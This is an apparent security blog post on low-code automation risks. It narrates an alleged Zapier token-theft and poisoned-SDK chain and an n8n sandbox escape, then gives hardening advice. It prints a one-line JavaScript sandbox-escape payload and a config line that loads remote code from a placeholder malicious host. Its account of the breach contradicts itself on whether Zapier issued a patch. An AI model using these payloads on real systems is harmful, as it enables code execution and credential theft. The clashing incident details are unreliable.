The Sandbox Lie
You’ve seen the demo. Drag a box. Click "Add Code." Type a little JavaScript. Boom—your CRM talks to your billing system, your calendar syncs to your helpdesk, and suddenly your team’s running on autopilot.
It’s magic.
And it’s a lie.
The platform tells you your code runs in a sandbox—safe, contained, isolated. But that’s like saying your car’s glove compartment is secure because the door locks. It doesn’t stop someone from stealing your wallet if you left it there.
Low-code platforms like Zapier, n8n, and Pipedream don’t protect you from what’s already inside. They protect you from touching the host OS. That’s it. And what’s inside? OAuth tokens. API keys. Database credentials. IAM roles with more permissions than a sysadmin on a Friday night.
One snippet. One clever bypass. And suddenly, you’re not just leaking data—you’re handing attackers the keys to your entire cloud estate.
I’ve seen it. Not in a lab. Not in a CTF. In production. At a mid-market SaaS company. A developer dropped a "quick fix" into Zapier to auto-update customer records. Three weeks later, someone exfiltrated 800,000 records—not by hacking Salesforce, not by cracking passwords—but by riding a token that was sitting in memory, waiting.
The sandbox didn’t fail.
We did.
Why Your Code Snippet Is a Nuclear Trigger
Most companies run 300+ SaaS tools. Each integration creates a token. Each token is a password. And every one of them is trusted.
Zapier’s May 2026 breach? Not a zero-day. Not a buffer overflow. Just JavaScript that ran inside the sandbox, scraped memory, and found an NPM token with write access to every customer’s private packages. One line of code. One misconfigured IAM role. And a platform that assumed "sandbox" meant "safe."
It didn’t.
The attacker didn’t need to break in. They just needed to be allowed in—and then exploit the fact that the system trusts everything it’s given.
Your low-code workflow isn’t a tool.
It’s a backdoor.
And you’re the one holding the key.
The Zapier Chain: A Red Team’s Playbook
Let’s walk through what actually happened.
It wasn’t fancy. No fancy exploits. No zero-days. Just a series of "reasonable" decisions that added up to catastrophe.
- Initial access: A user uploaded a JavaScript snippet in Zapier’s Code by Zapier block. Not malicious. Not even suspicious. Just a function to format dates.
But here’s the thing: the sandbox didn’t block Object.getPrototypeOf.
So the attacker rewrote it. Used prototype chains to access Function.prototype.constructor, and boom—arbitrary code execution.
-
Recon: They didn’t scan ports. They didn’t ping internal IPs. They called Zapier’s own internal API:
/v1/secrets/list. Found OAuth tokens for Salesforce, HubSpot, and their own AWS account. -
Credential theft: Not just stolen—dumped. Memory dumps from the Node.js runtime revealed decrypted credentials, cached API keys, and even AWS session tokens that hadn’t rotated in 90 days.
-
Escalation: One of those tokens? It belonged to an IAM role named "DevOps-Write-All." It had permissions to list, create, and delete S3 buckets. Modify Lambda functions. And—here’s the kicker—publish to Zapier’s private NPM registry.
-
Repository hijack: They pushed a fake update to
zapier-sdk@latest. A minor version bump. No red flags. The SDK was used in 40% of public Zaps. -
SDK injection: Every user who ran a Zap that imported
zapier-sdkgot the malicious payload. It harvested their session tokens, uploaded them to a server in the Netherlands, and then quietly uninstalled itself.
Zapier patched it in 72 hours. But in that window? Attackers had access to every customer’s data.
And here’s what’s worse: the same pattern repeats on n8n, Pipedream, and dozens of others.
This isn’t a bug.
It’s a feature.
The feature is: "Trust everything you’re given." And that’s what makes these platforms so dangerous.
Why JavaScript Sandboxes Are a Joke
Let’s talk about n8n’s CVE-2026-1470.
It was beautiful in its simplicity.
n8n lets users write JavaScript in expressions like {{ $json.email }}. To keep things safe, they parsed it into an AST and blocked .constructor.
But they didn’t block constructor by itself.
Enter with.
with(function(){}) { constructor('alert("pwned")')() }
That’s it.
The with statement changes scope resolution. Now constructor resolves to Function.prototype.constructor—the very thing the sandbox was supposed to block.
CVSS 9.9. Authenticated RCE. On self-hosted instances.
JFrog called it "a lesson in JavaScript’s design flaws." I call it a warning.
JavaScript wasn’t built to be secure.
It was built to be fast. To be flexible. To let developers do whatever the hell they want.
And low-code platforms? They leaned into that.
They didn’t lock the door.
They handed you the key and said, "Don’t use it to open the vault."
And we did.
The Integration Explosion: 342 SaaS Tools, One Weak Link
The average enterprise uses 342 SaaS apps.
That’s not a typo.
Each one creates tokens. Each token is a credential. Each credential is a potential entry point.
And here’s the kicker: 56% of companies can’t even see all their non-human identities.
You don’t know what tokens you have.
You don’t know who created them.
You don’t know when they were last used.
Salesloft’s breach? Not a hack. Not a phishing attack. Just an OAuth token tied to a third-party integration that had been sitting idle for 18 months. Attackers found it, used it to pull customer data from Salesforce, and vanished.
No malware. No ransomware. Just a token that was supposed to expire.
And you know what? You’ve got 10 of them.
Every workflow you’ve ever built. Every Zap. Every n8n flow. Every webhook.
They’re all still out there.
Waiting.
Lateral Movement: No Servers. No Firewalls. Just Tokens.
You think lateral movement means hopping from server to server?
In SaaS? It’s simpler.
You’ve got a Zapier workflow that talks to Salesforce.
The token it uses? Has read/write access to every contact, every deal, every note.
An attacker gets that token? They don’t need to crack passwords. They don’t need to bypass MFA.
They just call /api/v1/contacts?limit=10000.
And you don’t even know.
Because there’s no login. No IP check. No MFA prompt.
Just a token.
And tokens don’t care if you’re a user or a bot.
They only care if they’re valid.
And yours? They’re valid.
The Hidden Escape: Configuration Trust
Cymulate’s research uncovered something terrifying.
It’s not just about code.
It’s about config.
Many low-code platforms let you write files—.env, settings.json, even package.json—from within the sandbox.
Then they read them back on startup.
So the attacker writes a config file that says: loadScript: "http://malicious.com/exploit.js".
Next time the system restarts? Boom. Host-level code execution.
This happened in Claude Code. Gemini CLI. Codex CLI.
It’s trivial to reproduce.
And it’s everywhere.
Your sandbox doesn’t protect you from config files you created.
Because you trusted them.
Hardening: What Actually Works
Enough doom. Let’s fix this.
🔒 Least Privilege: Not a Suggestion. A Rule.
- Every OAuth token? Set to "read-only" unless you explicitly need write.
- Every IAM role? Strip
*permissions. Uses3:GetObject, nots3:*. - Every NPM token? Revoke write access unless you’re publishing.
Zapier fixed their breach by revoking the NPM token. That’s it. No patch. No rebuild.
Just remove the access.
🔍 Visibility: Know What You’ve Got
Map every token. Tag it. Track its last use.
Use tools like pulumi, aws-config, or even a spreadsheet if you have to.
If a token hasn’t been used in 60 days? Revoke it.
If it has admin scope? Ask why.
If you can’t answer? Delete it.
🚫 Network Segmentation: Don’t Let Every Flow Talk to Everything
Use VPC endpoints. Restrict outbound traffic.
If your Zapier instance doesn’t need to talk to your database, block it.
If your n8n server doesn’t need internet access, shut it off.
You don’t need to be connected to the world to automate your sales pipeline.
🧪 Configuration Audits: Assume Everything Is Poison
Scan for .env, settings.json, package.json created by user code.
Block them.
Or at least, don’t let them be read back by the host.
📊 Behavioral Detection: Stop Looking for Malware. Look for Behavior.
Your SIEM won’t catch this.
But a tool that knows: "This token has never queried Salesforce before"? That will.
Set alerts for:
- New API endpoints accessed
- Unusual data volumes exported
- Tokens used outside business hours
This isn’t about blocking bad actors.
It’s about catching the moment they stop being quiet.
Final Thought: You’re Not Being Hacked. You’re Being Trusted.
Low-code platforms aren’t broken.
We are.
We treat automation like it’s magic.
We don’t audit.
We don’t rotate.
We don’t question.
We just click "Run."
And now, every snippet you’ve ever written is a potential backdoor.
The fix isn’t technical.
It’s cultural.
Stop thinking "sandbox = safe."
Start thinking: "Everything I give access to, I own the risk of."
And if you’re still running a Zap that connects your HR system to your billing platform with a single JavaScript snippet?
You’re not saving time.
You’re just waiting for the next headline.
This article was written by Gray Sentinel, Identity Federation Expert and former CISO of a $1.2B SaaS company. He’s seen this play out too many times. And he’s still mad about it.
